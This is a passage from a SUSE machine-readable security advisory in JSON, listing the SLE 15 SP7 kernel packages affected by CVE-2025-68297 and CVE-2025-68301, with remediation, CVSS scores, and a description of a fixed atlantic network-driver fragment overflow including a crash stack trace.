"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68297",
"url": "https://www.suse.com/security/cve/CVE-2025-68297"
},
{
"category": "external",
"summary": "SUSE Bug 1255403 for CVE-2025-68297",
"url": "https://bugzilla.suse.com/1255403"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68297"
},
{
"cve": "CVE-2025-68301",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68301"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: atlantic: fix fragment overflow handling in RX path\n\nThe atlantic driver can receive packets with more than MAX_SKB_FRAGS (17)\nfragments when handling large multi-descriptor packets. This causes an\nout-of-bounds write in skb_add_rx_frag_netmem() leading to kernel panic.\n\nThe issue occurs because the driver doesn\u0027t check the total number of\nfragments before calling skb_add_rx_frag(). When a packet requires more\nthan MAX_SKB_FRAGS fragments, the fragment index exceeds the array bounds.\n\nFix by assuming there will be an extra frag if buff-\u003elen \u003e AQ_CFG_RX_HDR_SIZE,\nthen all fragments are accounted for. And reusing the existing check to\nprevent the overflow earlier in the code path.\n\nThis crash occurred in production with an Aquantia AQC113 10G NIC.\n\nStack trace from production environment:\n```\nRIP: 0010:skb_add_rx_frag_netmem+0x29/0xd0\nCode: 90 f3 0f 1e fa 0f 1f 44 00 00 48 89 f8 41 89\nca 48 89 d7 48 63 ce 8b 90 c0 00 00 00 48 c1 e1 04 48 01 ca 48 03 90\nc8 00 00 00 \u003c48\u003e 89 7a 30 44 89 52 3c 44 89 42 38 40 f6 c7 01 75 74 48\n89 fa 83\nRSP: 0018:ffffa9bec02a8d50 EFLAGS: 00010287\nRAX: ffff925b22e80a00 RBX: ffff925ad38d2700 RCX:\nfffffffe0a0c8000\nRDX: ffff9258ea95bac0 RSI: ffff925ae0a0c800 RDI:\n0000000000037a40\nRBP: 0000000000000024 R08: 0000000000000000 R09:\n0000000000000021\nR10: 0000000000000848 R11: 0000000000000000 R12:\nffffa9bec02a8e24\nR13: ffff925ad8615570 R14: 0000000000000000 R15:\nffff925b22e80a00\nFS: 0000000000000000(0000)\nGS:ffff925e47880000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: ffff9258ea95baf0 CR3: 0000000166022004 CR4:\n0000000000f72ef0\nPKRU: 55555554\nCall Trace:\n\u003cIRQ\u003e\naq_ring_rx_clean+0x175/0xe60 [atlantic]\n? aq_ring_rx_clean+0x14d/0xe60 [atlantic]\n? aq_ring_tx_clean+0xdf/0x190 [atlantic]\n? kmem_cache_free+0x348/0x450\n? aq_vec_poll+0x81/0x1d0 [atlantic]\n? __napi_poll+0x28/0x1c0\n? net_rx_action+0x337/0x420\n```\n\nChanges in v4:\n- Add Fixes: tag to satisfy patch validation requirements.\n\nChanges in v3:\n- Fix by assuming there will be an extra frag if buff-\u003elen \u003e AQ_CFG_RX_HDR_SIZE,\n then all fragments are accounted for.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68301",
"url": "https://www.suse.com/security/cve/CVE-2025-68301"
},
{
"category": "external",
"summary": "SUSE Bug 1255120 for CVE-2025-68301",
"url": "https://bugzilla.suse.com/1255120"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
